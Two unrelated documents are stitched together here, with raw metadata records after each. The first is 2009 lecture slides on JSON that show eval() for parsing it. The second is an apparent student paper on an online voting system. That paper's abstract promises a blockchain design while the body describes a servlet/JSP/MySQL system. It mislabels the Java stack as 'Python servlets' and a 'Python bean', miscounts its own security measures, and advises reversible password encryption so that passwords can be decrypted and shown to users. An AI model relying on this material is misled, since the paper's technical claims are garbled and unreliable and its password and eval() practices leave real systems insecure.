JSON (JavaScript Object Notation) is a programming language model data interchange format. It is minimal, textual, and a subset of JavaScript. What is JSON? - Lightweight data-interchange format - Compared to XML - Simple format - Easy for humans to read and write - Easy for machines to parse and generate - JSON is a text format - Programming language independent - Uses conventions that are familiar to programmers of the C-family of languages, including C, C++, C#, Java, JavaScript, Perl, Python JSON Structures - A collection of name/value pairs - In various languages, this is realized as an object, record, struct, dictionary, hash table, keyed list, or associative array - An ordered list of values - In most languages, this is realized as an array, vector, list, or sequence - These are universal data structures supported by most modern programming languages JSON Object Notation - A JSON object is an unordered set of name/value pairs - A JSON object begins with { (left brace) and ends with } (right brace) - Each name is followed by : (colon) and the name/value pairs are separated by , (comma) The types represented in JSON are strings, numbers, booleans, object, arrays, and null. The types represented in JSON are strings, numbers, booleans, object, arrays, and null. • JSON vs. XML ```json {"menu": { "id": "file", "value": "File", "popup": { "id": "file", "value": "Save", "onclick": "CreateNewDoc()" } } ``` Start of JSON object Start of JSON array Name Value Name/Value pairs separated by comma JSON http://www.json.org/fatfree.html - JSON has **no version number**. No revisions to the JSON grammar are anticipated. “If something has a 1.0, it will inevitably get a 1.1 and a 2.0, and everything is crap until it is 3.0. JSON is very stable.” - JSON **doesn't have namespaces**. Every object is a namespace: its set of keys is independent of all other objects, even exclusive of nesting. JSON uses context to avoid ambiguity, just as programming languages do. - JSON **is not extensible**. “It does not need to be. It can represent any non-recurrent data structure as is. JSON is flexible. New fields can be added to existing structures without obsoleting existing programs.” Text to Object Conversion in JavaScript code ```javascript var myObject = eval('(' + myJSONtext + ')'); ``` - To convert a JSON text into an JSON object, use the `eval()` function - `eval()` invokes the JavaScript compiler - Since JSON is a proper subset of JavaScript, the compiler will correctly parse the text and produce an object structure JSON Slides taken from Sang Shin, Java Technology Architect, Sun Microsystems, Inc Security & JSON Parser // Include http://www.json.org/json.js var myObject = myJSONtext.parseJSON(); - eval() can compile and execute any JavaScript program, so there can be security issues (cross-site scripting) - Use eval() when the source can be trusted - When security is a concern - the source cannot be trusted - it is better to use a JSON parser - A JSON parser will only recognize JSON text and so is much safer How to Receive JSON Data at the Client Side - JSON data is received as a string - Calling `eval()` will generate JSON object in JavaScript code ```javascript var JSONdata = eval(req.responseText); ``` - Once you have JSON object, you can use . notation to access its properties ```javascript var name = JSONdata.name; var address = JSONdata.addresses[3]; var streetname = JSONdata.addresses[3].street; ``` # Approximate Course Schedule <table> <thead> <tr> <th>Month</th> <th>MatLab Exercises</th> <th>Yahoo Boss Search Challenge</th> <th>Optional! Google Online Marketing Challenge</th> </tr> </thead> <tbody> <tr> <td>March</td> <td>Today: HA1.1</td> <td></td> <td></td> </tr> <tr> <td></td> <td>Next week: HA1.2</td> <td></td> <td></td> </tr> <tr> <td>April</td> <td></td> <td>Easter holidays</td> <td><strong>Overlap!</strong></td> </tr> <tr> <td>May</td> <td></td> <td></td> <td></td> </tr> <tr> <td>June</td> <td></td> <td></td> <td></td> </tr> </tbody> </table> **Overlap!** Home Assignment 1.1 Network Examples [Images of network diagrams] Home Assignment 1.1 Get familiar with REST APIs - http://www.programmableweb.com/ with Pajek and the Pajek .net Format - http://vlado.fmf.uni-lj.si/pub/networks/pajek/ - http://iv.slis.indiana.edu/Im/Im-pajek.html Useful Links JSON Reader Tool - http://jsontools.berlios.de/ Eclipse Plugin ANTLR (parser generator) - http://antlr4eclipse.sourceforge.net/ Other JSON Tools - http://www.json.org/java/ For questions please post to the newsgroup: Your tutors Gabi and Ingo will try to help with your questions Any questions? See you next week!
{"Source-Url": "http://markusstrohmaier.info/courses/SS2009/707.000_web-science/slides/week-web-technologies-I.pdf", "len_cl100k_base": 5841, "olmocr-version": "0.1.53", "pdf-total-pages": 51, "total-fallback-pages": 0, "total-input-tokens": 69330, "total-output-tokens": 7374, "length": "2e12", "weborganizer": {"__label__adult": 0.0004856586456298828, "__label__art_design": 0.0011663436889648438, "__label__crime_law": 0.00048613548278808594, "__label__education_jobs": 0.06890869140625, "__label__entertainment": 0.00021135807037353516, "__label__fashion_beauty": 0.00032258033752441406, "__label__finance_business": 0.0005888938903808594, "__label__food_dining": 0.0005507469177246094, "__label__games": 0.0006260871887207031, "__label__hardware": 0.0020580291748046875, "__label__health": 0.0006346702575683594, "__label__history": 0.0007119178771972656, "__label__home_hobbies": 0.00031447410583496094, "__label__industrial": 0.0007171630859375, "__label__literature": 0.0009031295776367188, "__label__politics": 0.00031948089599609375, "__label__religion": 0.0008974075317382812, "__label__science_tech": 0.0943603515625, "__label__social_life": 0.0005373954772949219, "__label__software": 0.033660888671875, "__label__software_dev": 0.7900390625, "__label__sports_fitness": 0.0003559589385986328, "__label__transportation": 0.000713348388671875, "__label__travel": 0.0004029273986816406}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 21966, 0.01539]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 21966, 0.56601]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 21966, 0.84691]], "google_gemma-3-12b-it_contains_pii": [[0, 263, false], [263, 531, null], [531, 1084, null], [1084, 1750, null], [1750, 1945, null], [1945, 2081, null], [2081, 2292, null], [2292, 2447, null], [2447, 2566, null], [2566, 3524, null], [3524, 4113, null], [4113, 4578, null], [4578, 5188, null], [5188, 5649, null], [5649, 5961, null], [5961, 6922, null], [6922, 8028, null], [8028, 8146, null], [8146, 8930, null], [8930, 8988, null], [8988, 9540, null], [9540, 10169, null], [10169, 10551, null], [10551, 10877, null], [10877, 11143, null], [11143, 11681, null], [11681, 12020, null], [12020, 12298, null], [12298, 12671, null], [12671, 12963, null], [12963, 13719, null], [13719, 14411, null], [14411, 14881, null], [14881, 15449, null], [15449, 16413, null], [16413, 16926, null], [16926, 17439, null], [17439, 17813, null], [17813, 18053, null], [18053, 18141, null], [18141, 18229, null], [18229, 18506, null], [18506, 19192, null], [19192, 19543, null], [19543, 20054, null], [20054, 20477, null], [20477, 21258, null], [21258, 21372, null], [21372, 21419, null], [21419, 21932, null], [21932, 21966, null]], "google_gemma-3-12b-it_is_public_document": [[0, 263, true], [263, 531, null], [531, 1084, null], [1084, 1750, null], [1750, 1945, null], [1945, 2081, null], [2081, 2292, null], [2292, 2447, null], [2447, 2566, null], [2566, 3524, null], [3524, 4113, null], [4113, 4578, null], [4578, 5188, null], [5188, 5649, null], [5649, 5961, null], [5961, 6922, null], [6922, 8028, null], [8028, 8146, null], [8146, 8930, null], [8930, 8988, null], [8988, 9540, null], [9540, 10169, null], [10169, 10551, null], [10551, 10877, null], [10877, 11143, null], [11143, 11681, null], [11681, 12020, null], [12020, 12298, null], [12298, 12671, null], [12671, 12963, null], [12963, 13719, null], [13719, 14411, null], [14411, 14881, null], [14881, 15449, null], [15449, 16413, null], [16413, 16926, null], [16926, 17439, null], [17439, 17813, null], [17813, 18053, null], [18053, 18141, null], [18141, 18229, null], [18229, 18506, null], [18506, 19192, null], [19192, 19543, null], [19543, 20054, null], [20054, 20477, null], [20477, 21258, null], [21258, 21372, null], [21372, 21419, null], [21419, 21932, null], [21932, 21966, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 21966, null]], "pdf_page_numbers": [[0, 263, 1], [263, 531, 2], [531, 1084, 3], [1084, 1750, 4], [1750, 1945, 5], [1945, 2081, 6], [2081, 2292, 7], [2292, 2447, 8], [2447, 2566, 9], [2566, 3524, 10], [3524, 4113, 11], [4113, 4578, 12], [4578, 5188, 13], [5188, 5649, 14], [5649, 5961, 15], [5961, 6922, 16], [6922, 8028, 17], [8028, 8146, 18], [8146, 8930, 19], [8930, 8988, 20], [8988, 9540, 21], [9540, 10169, 22], [10169, 10551, 23], [10551, 10877, 24], [10877, 11143, 25], [11143, 11681, 26], [11681, 12020, 27], [12020, 12298, 28], [12298, 12671, 29], [12671, 12963, 30], [12963, 13719, 31], [13719, 14411, 32], [14411, 14881, 33], [14881, 15449, 34], [15449, 16413, 35], [16413, 16926, 36], [16926, 17439, 37], [17439, 17813, 38], [17813, 18053, 39], [18053, 18141, 40], [18141, 18229, 41], [18229, 18506, 42], [18506, 19192, 43], [19192, 19543, 44], [19543, 20054, 45], [20054, 20477, 46], [20477, 21258, 47], [21258, 21372, 48], [21372, 21419, 49], [21419, 21932, 50], [21932, 21966, 51]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 21966, 0.09598]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
396aa2c8e4140afffbcbc38159466ddde32a36ed
Online Voting System Noor Ahmed¹, Prof. Anupama Pattanasetty² ¹PG Student, Department of Artificial Intelligence and Data Science, Sharnbasava University Kalaburagi, Karnataka, India. nnoorahmedd@gmail.com ²Professor, Department of Computer Science, Sharnbasava University Kalaburagi, Karnataka, India. anubngp.pama10@gmail.com ABSTRACT Having a democratic voting system in place is crucial for any nation due to the general distrust of the conventional voting system. Individuals have seen the infringement of their basic rights. Lack of transparency has been a problem with several electronic voting methods. The government has a hard time winning the confidence of its citizens since most voting processes aren’t transparent enough. It is easy to abuse, which is why both the old and new digital voting systems have failed. Finding solutions to issues with both the paper and electronic voting systems, such as voting-related injustices and accidents, is the main goal. A fair election with less injustice is possible with the use of blockchain technology integrated into the voting process. Both digital and physical voting methods have their limitations, making them unsuitable for widespread use. This evaluates the importance of finding a way to protect people's democratic rights. To foster confidence between voters and election officials, this article introduces a platform built on blockchain technology, which maximises system stability and transparency. Without the need for traditional polling places, the proposed technology lays the groundwork for digital voting using blockchain. A scalable blockchain may be supported by our suggested architecture via the use of adaptable consensus algorithms. The voting process is made more secure with the use of the Chain Security algorithm. When conducting a chain transaction, smart contracts provide a safe channel of communication between the user and the network. There has also been talk of the voting system’s security being based on blockchain technology. Keywords: Voting system, attributes, Use case diagram, TCP I. INTRODUCTION In this context, "voting" means making a selection. Voting or other electoral processes may facilitate this kind of expression. Votes cast via a particular electronic media may be collected, counted, and saved electronically through electronic voting. The planned project’s primary objective is to replace the University of Westminster Student Union's present paper-based election method with an electronic one. At now, the student union's voting method is experiencing low voter participation since it is inconvenient for the majority of students. This problem will be solved by the proposed method, which would allow voters to choose their candidates using any computer with an internet connection. This project will analyse the student union's present voting procedure and find a way to model it with the online voting system that will be put into place. Voting procedures will be handled by the system through various election mechanisms. The system will be designed with a strong emphasis on security. These safeguards will be in place from the moment a voter enters the voting system until they leave, ensuring that every step of the voting process is secure. Voters will be unable to cast multiple ballots for the same candidates thanks to the system's robust security measures. II. LITERATURE SURVEY Various approaches and procedures are used in the numerous activities aimed at introducing modifications to electronic and online voting systems. Although some of these measures do a good job of protecting the system's secrecy and security, complex technologies are still required to oversee and manage the voting process and all of the related data. 2.1 BASIC E-VOTING APPROACH/ARCHITECTURE To ensure the safe transmission of data, systems designed to facilitate digital voting via internet portals and smart devices use a variety of encryption and decryption mechanisms. - **HOMOMORPHIC ENCRYPTION TECHNIQUE** A strong and widely-used method, homomorphic encryption is recognised for its various uses. Online voting system design has recently made use of it. This encryption is based on the El Gamal exponential cryptosystem, which is used in the voting system. We encrypt every vote using the exponential El Gamal algorithm before sending it in. You may immediately tally encrypted votes without decrypting them because to the additive homomorphism characteristic of this crypto scheme. - **CENTRALIZED ARCHITECTURE:** Nevertheless, there are a variety of methods available for encoding data in order to safeguard it from tampering during transmission to the network. Here we may talk about a downside: when the right data is put in the database, there has to be a lot of trust and security. Because of the security risks posed by hacking and other forms of unauthorised access, centralised storage is cumbersome for highly valuable data. Fig:1 Centralized Architecture of Voting system The centralised architectural technique makes use of previous models and designs. Potential ethical and security concerns might arise from such. We put the data at danger by collecting it all in one place. It is susceptible to unjust control. Therefore, with the aid of blockchain technology, the fair framework is able to circumvent the issue of data storage in a distributed manner. A distributed ledger, a block chain records all transactions in chronological order. In traditional databases, one entity is responsible for its upkeep and maintenance. This entity has full authority over the database and may do whatever they want with the recorded data, including adding fake data, censoring otherwise legitimate modifications, or manipulating the data itself. A financial network is one example of a use case where the data stored is too sensitive and the temptation to manipulate it is too great to let a single organisation have complete control over the database. In most cases, this is not an issue because the organisation maintaining the database does so for its own benefit and has no reason to falsify the database’s contents. 2.2 AIMS AND OBJECTIVES The following are goals and objectives of the system that is to be developed: - The creation of an online voting system would allow citizens to choose their preferred candidates. - Make sure that only authorised users may access the voting system by establishing a safe authentication mechanism. - For the purpose of keeping track of votes and user data, construct a database. - Investigate any security flaws in the system and put a plan into action to prevent unauthorised access to the voting process. - Turn on the feature that counts votes by candidate. - In order to facilitate efficient administration of the election system, it is necessary to construct a backend administrative section. - Build the administrator's tools to add, remove, and edit users', candidates', and subadministrators' information on the system. - Present the results of the vote graphically so that the administrator may examine them. - So that people may vote for the candidates of their choice - Permit voters to peruse candidate biographies throughout the voting process. - Record the exact time each vote was cast by adding a timestamp to the database. This will allow administrators to easily produce reports based on the results of the vote. - Stop people from casting multiple ballots for the same candidates. III. INTERNET TECHNOLOGY The Internet is a system of publicly accessible, globally distributed computer networks that employ the Transmission Control Protocol/Internet Protocol (TCP/IP) protocol to transfer data in a packet switched format. It was necessary to conduct a thorough investigation of internet technology as it would be used to transmit data between the voting system's client and server. 3.1 INTERNET HISTORY In its early days, the Internet was a research effort in the late 1960s that aimed to better understand computer-to-computer data transfers using packet switching. The grant money for the study came from ARPA, which is part of the US Department of Defence. Data packets in a packet switching network may travel along any route between their origin and destination [9]. A distinct network address is used to identify the sender and the recipient. The ARPANET network came into being because of the study. The fourth version of the Internet Protocol, which TCP/IP networks would utilise, was developed in 1978. Formerly run by DARPA, the ARPANET was transferred to the Defence Communications Agency (DCA) in 1983. Internet popularity skyrocketed as a result of this change, which allowed for its broad usage in educational institutions all around the globe. 3.2 TCP/IP PROTOCOL SUITE One network design that allows for the connection of several networks is the TCP/IP protocol suite. Multiple layers make up the TCP/IP protocol suite reference model, and they all work together to provide data transfer across the internet. The following is a description of the layers and what they do. **Application Layer:** Supports the whole suite of high-level protocols included in the TCP/IP package. Here you may find the File Transfer protocol (FTP), which allows you to move files between different hosts. Domain Name System (DNS), Virtual Terminal Protocol (TELNET), Simple Mail Transfer Protocol (SMTP), and other protocols are accommodated at this layer. **Transport Layer:** Facilitates data transfer between two hosts on a network. According to the TCP/IP Reference model, two protocols may coexist on the transport layer that sits above the internet layer. The User Datagram Protocol (UDP) and the Transmission Control Protocol (TCP), both of which will be discussed in further detail later in the paper. Because it is a connectionless protocol, UDP does not ensure that datagrams will arrive at their destination on time. When transmitting data, UDP does not regulate the flow or congestion as TCP does. **Internet Layer:** It is the foundation of the TCP/IP protocol suite. The main function of this layer is to direct data packets as they go from one network to another. Internet Protocol packets are delivered to their particular destinations via the Internet layer. **Network Access Layer:** In the Internet reference model, the lowest layer is the network access layer. At this level, you'll find the protocols that the host machine use to communicate with the other nodes in the network. Fig:2 TCP/IP Reference model. 3.3 INTERNET PROTOCOL Packet transmission is a fundamental function provided by the Internet Protocol. Data packet switching in a packet switched network is made possible by the Internet Protocol, a data-oriented protocol. As a packet service, the Internet Protocol (IP) is not foolproof; it cannot ensure the secure transmission of data packets from their originator to their destination. Internet Protocol data packets are susceptible to duplication, latency, and loss. Datagrams may be sent securely by using the Transmission Control Protocol. The TCP/IP Reference model's Internet Layer defines Internet Protocol. 3.4 TRANSMISSION CONTROL PROTOCOL Transmission Control Protocol (TCP) is the most used protocol within the Internet Protocol family. Transmit Control Protocol (TCP) is a dependable connection-oriented protocol that ensures error-free transmission of data packets across the Internet from one computer to another. The Transmission Control Protocol (TCP) allows hosts on a network to reliably send and receive datagrams and packets. TCP ensures that data packets travel from their origin to their final destination. Also, TCP separates data for many programmes that are operating on the same host computer at the same time, such as an email server and a web server. Guaranteed packet delivery and data serialisation are two essential features provided by TCP that the Internet Protocol does not. The destination host will utilise the sequence number that TCP assigns to each data packet that is sent. IV. SYSTEM DESIGN 4.1 DATABASE DESIGN A database system must be established to hold all the data collected from the users of the online voting system before it can be developed. Enforcing and enhancing the security of the voting system will also be greatly aided by the database system that is to be established. The database system will hold user information, which will be used for authentication purposes. Because of its low price tag and availability as open source software, MySQL database server has been chosen as the preferred database. In order to store the massive amounts of data that will be entered, MySQL's enormous storage capacity will be crucial. 4.1.1 Entities & Attributes Entities and attributes will serve as the building blocks of the database structure that is about to be built. The entities are represented by the database tables that are going to be constructed. Various fields, represented as characteristics, are stored in the tables. You may configure these properties to hold either text or numeric values, among other data types. A primary key, stored in an attribute of each object, is a value that uniquely identifies a row in a table or entity. To illustrate the database's logical structure and the links between entities, entity relationship diagrams were constructed. You may find these diagrams in Appendix C. There is a description of all the database entities in the entity table. **DATABASE ENTITY & ATTRIBUTE DIAGRAM** ![Diagram of Administrator entity with its attributes](image) **Fig:3 Administrator entity with its attributes** Fig: 4 Users entity with its attributes Fig: 5 Candidate entity with its attributes Fig: 6 Voters’ entity with its attributes 4.2 SOFTWARE DESIGN A software design details the algorithms to be used, the user interfaces to interact with the system’s components, the data that will be a part of the system, and the structure of the programme that will be implemented. Before building any part of the online voting system, the system software must be carefully considered and designed. All the steps needed to complete a given task within the system will be considered during the software design phase. Two design methodologies may be utilised to develop a well-structured design, and the system design would demonstrate the data flow inside the system. Using a technique called functional decomposition, structured software modelling breaks down the system into sets of interdependent functions, allowing for a more top-down and function-oriented approach to software development. To illustrate the inner workings of a system, the model primarily makes use of data flow diagrams. on page 34 A design style known as "Object-Oriented Design" (OOD) may help developers simplify their projects by using self-contained objects that can interact with one another. The discipline known as object-oriented design UML modelling diagrams. [4] 4.2.1 Use Case Modeling It is crucial to utilise a more end-user friendly design approach and avoid using complicated technical jargon when representing the system's architecture to an end user, similar to a system analyst. The needs of the online voting system may be represented via use case modelling, which shows potential interactions between the system and its users. People whose jobs it is to interact with the various parts of the system are called "actors." The administrators and voters are the most important parts of the system. You can see using the use case model which parts of the system each player will be engaging. **ADMINISTRATOR USE CASE DIAGRAM** ![Administrator use case diagram](image1) **VOTER USE CASE DIAGRAM** ![Voter use case diagram](image2) 4.2.2 System Access Design Implementation of the system will be contingent upon its possessing robust authentication capabilities. To guarantee that only authorised users may access the system, authentication is a must. The design of the system's login access is crucial to the security of the voting system. Administrators and voters should be able to access the system using different login pages. To prevent voters from gaining access to the administrator's page, the system will provide separate access privileges to each actor utilising the system. Each user would have their... own Python class that checks the system database using SQL statements to verify their login credentials. This would be part of the login page design process. An error message should be sent to the user in the form of a Python bean if the data submitted is incorrect or does not match the information in the database system. Fig: 9 Displays the system’s access login design The basic difficulty that any safe system would have is users forgetting their selected passwords. An adequate facility has to be built to cope with this problem. As part of the voting system's design, the administrators' and voters' login pages will be connected to a page where users can retrieve forgotten passwords. It will be mandatory for every user to have a memorable word that can be used to retrieve their password from the system's database. Python servlets have validation functions built in to them, so users can't get their passwords unless they provide the right username and a secret phrase. 4.2.3 Administrator & Voter Design The administrator and voter will have access to their designated areas when the authentication procedure is complete and their authority to do so has been granted. After choosing a candidate to vote for and logging out of the system, voters would no longer be able to access the system. The administrator may add, remove, and view administrators, candidates, and voters. When candidates’ names are added or removed, the voter's JSP page will likewise dynamically update to reflect the changes. 4.2.4 System Security Design The suggested system must include robust security measures to protect the honesty of the voting process, which is of the utmost importance. To make the system more secure, three different types of security mechanisms were built into it to protect the database and the data flowing through it. In addition to the login facility, the four measures must be employed. **Table: 1 Security features to be implemented in the system** <table> <thead> <tr> <th>Feature</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td><strong>System access attempts log</strong></td> <td>The database would be able to keep track of how many times a user tries to log in with the erroneous password using this security feature. Once a certain threshold of attempts has been reached, the system should automatically log the user out. The purpose of this step is to stop anyone from trying to guess passwords.</td> </tr> <tr> <td><strong>Password Encryption</strong></td> <td>Passwords input into the system would be encrypted using an encryption technique as part of this security feature. This would render the stored passwords worthless in the event that the database was stolen. A decryption process would be used to restore the encrypted password to its original form before displaying it to the user on the forgotten password page.</td> </tr> <tr> <td><strong>Secure Socket Layer (SSL) Transmission</strong></td> <td>The security measure would encrypt all data entered by the user’s browser, making it impossible for a hacker to access the data.</td> </tr> </tbody> </table> 4.2.5 System Architecture Several technologies on both the client and server sides would collaborate to form the system's architecture. FRONT END The front end of the system is the voting system's user interface, which is accessed via the user's web browser. It is here that users may communicate with the server by sending and receiving HTTP requests. Using HTML, the base of the system may be constructed. BACKEND Here, on the server side of the programme, known as the back end, all of the HTTP requests that come in from the client are processed. The servlet and jsps files will be loaded by a Tomcat server engine. The engine may then issue requests, and the client will get the dynamic content in HTML format so that they can browse the website. Data provided from the system's client will be saved in a database; specifically, the system will make use of the MySql database. The JDBC API driver acts as a middleware layer, translating method calls in Python to database API calls, allowing the database to get data from the server. ![System Architecture Diagram] Fig: 12 System Architecture V. TESTING The system needs to undergo extensive testing to guarantee its flawless operation. During the testing phase, the online voting system's features will be double-checked to ensure they function as intended. Any bugs or flaws will also be found. An appropriate testing technique must be used to carry out the system testing process efficiently. Considerations about the size and complexity of the system to be tested should be examined while selecting an acceptable testing technique. 5.1 TEST STRATEGIES The most common approaches of testing software-based systems are white box and black box testing, however there are other ways that may be utilised as well. 5.1.1 Black Box Testing The tester employs this method, which is also called functional testing, when they are unaware of the system's inner workings. Instead of testing the actual code, the tester runs the tests according to the criteria that have already been defined. In this kind of test, the end user enters data into the system and verifies that it produces the intended result. Users of the system may do the tests with no previous knowledge of the system's coding, which is a benefit of black box testing. [36] 5.1.2 White Box Testing The purpose of this testing approach—also called structural testing or glass box testing—is to examine the inner workings of the system's code and logic. In order to find any broken code, the tester must have clear understanding of the code used to build the system. [35] Both testing methodologies must be used to ensure that the system is tested appropriately. 5.1.3 Test Plan Making a test plan is necessary for thoroughly testing the online voting system's functionality. The designed test strategy would disrupt the testing procedures to address any issue with the online voting system. Various web browsers, as well as the system and database servers, and online pages, would be the primary targets of the testing procedure. Because the system's functionality depends on the web browsers used by its users, this test must be performed. Login authentication elements would be the primary emphasis of the testing process. These features are essential to the system as a whole, since they prevent unauthorised access and keep the system secure. The encryption and decryption capabilities of the passwords in use would be verified by conducting a test. To make sure the user gets the right message if the forms aren't filled out properly, the system's form validation has to be tested. To make sure that the data being obtained from users is really entering the database system, it is necessary to verify the system database engines that link the application to the database system. 5.2 TEST DATA <table> <thead> <tr> <th>Test Ref No</th> <th>Test Data</th> <th>Expected Outcome</th> <th>Final result</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>Connect to server</td> <td>The Client should be able to Connect to server</td> <td>Pass</td> </tr> <tr> <td>2</td> <td>Connect to mysql database</td> <td>The Client should be able connect to data base</td> <td>Pass</td> </tr> <tr> <td>3</td> <td>Test internet explorer browser compatibility</td> <td>When user enters the online voting url welcome page should be displayed</td> <td>Pass</td> </tr> <tr> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td>---</td> <td>---</td> <td>---</td> <td>---</td> </tr> <tr> <td>4</td> <td>Test Netscape browser compatibility</td> <td>When user enters the online voting url welcome page should be displayed</td> <td>Pass</td> </tr> <tr> <td>5</td> <td>Test SSL connection from web browser</td> <td>Using the secure local host port number 8443, the user should be able to enter the website over a secure connection</td> <td>Pass</td> </tr> <tr> <td>6</td> <td>Web Page Navigation</td> <td>Webpage navigation links to should open specified web page</td> <td>Pass</td> </tr> <tr> <td>7</td> <td>Login validation</td> <td>Error message should be displayed when inappropriate data is entered</td> <td>Pass</td> </tr> <tr> <td>8</td> <td>Login process to distinguish voter and administrator</td> <td>Voter should not be allowed to login into admin page, admin should not be allowed to login into voter page</td> <td>Pass</td> </tr> <tr> <td>9</td> <td>Attempt to guess password more than three time during login</td> <td>System user should be blocked from accessing the system on third attempt</td> <td>Pass</td> </tr> <tr> <td>10</td> <td>Voter view and select candidate and submit vote</td> <td>The voters choice of candidates should be displayed on confirmation page</td> <td>Pass</td> </tr> <tr> <td></td> <td>Description</td> <td>Requirement</td> <td>Status</td> </tr> <tr> <td>---</td> <td>-------------------------------------------------</td> <td>-----------------------------------------------------------------------------</td> <td>--------</td> </tr> <tr> <td>11</td> <td>Voter casts votes</td> <td>The voters table in voting database should be updated with new votes</td> <td>Pass</td> </tr> <tr> <td>12</td> <td>Login Block for voter</td> <td>Voter who has voted once should be flagged and blocked from voting again</td> <td>Pass</td> </tr> <tr> <td>13</td> <td>Voting results page</td> <td>The votes counted should be updated when new vote is cast</td> <td>Pass</td> </tr> <tr> <td>14</td> <td>Add voter, candidate and administrators validation</td> <td>Error message should be generated if necessary boxes are not filled in and if username chosen is already taken</td> <td>Pass</td> </tr> <tr> <td>15</td> <td>JDBC connection to database</td> <td>Data from registration form should be entered into database</td> <td>Pass</td> </tr> <tr> <td>16</td> <td>Password encryption</td> <td>Password entered into database should be encrypted</td> <td>Pass</td> </tr> <tr> <td>17</td> <td>Administrator should be able to view voters, candidate &amp; admin details from database</td> <td>Data from database should be printed on screen</td> <td>Pass</td> </tr> <tr> <td>18</td> <td>Administrator should be able to delete voter, candidate and administrator detail</td> <td>Details of voter, candidate &amp; administrator should be deleted from database</td> <td>Pass</td> </tr> <tr> <td>19</td> <td>Password Decryption</td> <td>Forgotten password request by user should be decrypted before being sent to user screen</td> <td>Pass</td> </tr> <tr> <td>20</td> <td>Logoff</td> <td>User should be able to log off successfully from system</td> <td>Pass</td> </tr> </tbody> </table> VI. CONCLUSION In this section, we shall go over the overall system's evolution. It will provide a glimpse into the overall steps that were done to complete the project. Goals and goals from the original plan, as well as those that were unattainable, will also be covered. In it, we'll talk about the project's flaws and the things that need fixing so we can make the system better in the future. The primary goal of this research was to provide a safe method of internet voting. The project's overarching goal was to migrate from paper ballots to electronic ones, so that people could cast their ballots from anywhere in the world with an internet connection. Researchers looked at the many online voting systems available today, comparing and contrasting their features and learning how to get more people to cast their ballots. In order to choose the most appropriate programming language for building the online voting system, several server-side technologies were researched. Researchers looked at potential threats to the online voting system's security and developed strategies to mitigate them. The waterfall methodology was determined to be the best suitable development approach for this specific project after a thorough evaluation of many software development approaches. The primary goal of the system's design and development was to realise a solution in accordance with the ideas presented in the system proposal. At this stage, the process for building the system was laid out in detail. Developing a user-friendly interface for data retrieval, securing the system, and querying the database using Python classes and scripts were the primary goals. In order to find any flaws or weaknesses in the system, it was subjected to extensive testing throughout the project's testing phase. The system was determined to be ready for delivery to end users based on the test findings. Because of its intended application in the student union election process, the developed system achieved its goals of being both easy to use and secure. REFERENCES 1. Jayson Falkner, Ben Galbraith, Romin Irani, Casey Kochmer, Sathya Narayana Panduranga, Krishnaraj 5. Bruce W. Perry, (2004), Python Servlet & JSP Cookbook, O'Reilly 7. Time Stamp. URL: http://whatis.techtarget.com/definition/0,,sid9_gci817089,00.html
{"Source-Url": "https://www.jsrtjournal.com/index.php/JSRT/article/download/91/115", "len_cl100k_base": 6011, "olmocr-version": "0.1.50", "pdf-total-pages": 18, "total-fallback-pages": 0, "total-input-tokens": 42101, "total-output-tokens": 7231, "length": "2e12", "weborganizer": {"__label__adult": 0.0003812313079833984, "__label__art_design": 0.000423431396484375, "__label__crime_law": 0.0015192031860351562, "__label__education_jobs": 0.003131866455078125, "__label__entertainment": 0.00015044212341308594, "__label__fashion_beauty": 0.00020241737365722656, "__label__finance_business": 0.0003788471221923828, "__label__food_dining": 0.00045418739318847656, "__label__games": 0.0026302337646484375, "__label__hardware": 0.0017766952514648438, "__label__health": 0.00060272216796875, "__label__history": 0.0005254745483398438, "__label__home_hobbies": 9.626150131225586e-05, "__label__industrial": 0.0004832744598388672, "__label__literature": 0.0002760887145996094, "__label__politics": 0.0028667449951171875, "__label__religion": 0.00039124488830566406, "__label__science_tech": 0.08251953125, "__label__social_life": 0.00018131732940673828, "__label__software": 0.025970458984375, "__label__software_dev": 0.87353515625, "__label__sports_fitness": 0.0005249977111816406, "__label__transportation": 0.0006122589111328125, "__label__travel": 0.00017344951629638672}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 31903, 0.02477]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 31903, 0.5553]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 31903, 0.91051]], "google_gemma-3-12b-it_contains_pii": [[0, 3767, false], [3767, 6479, null], [6479, 10505, null], [10505, 13241, null], [13241, 13639, null], [13639, 13679, null], [13679, 13723, null], [13723, 14974, null], [14974, 16340, null], [16340, 17323, null], [17323, 17853, null], [17853, 19479, null], [19479, 21082, null], [21082, 24010, null], [24010, 25006, null], [25006, 26843, null], [26843, 31128, null], [31128, 31903, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3767, true], [3767, 6479, null], [6479, 10505, null], [10505, 13241, null], [13241, 13639, null], [13639, 13679, null], [13679, 13723, null], [13723, 14974, null], [14974, 16340, null], [16340, 17323, null], [17323, 17853, null], [17853, 19479, null], [19479, 21082, null], [21082, 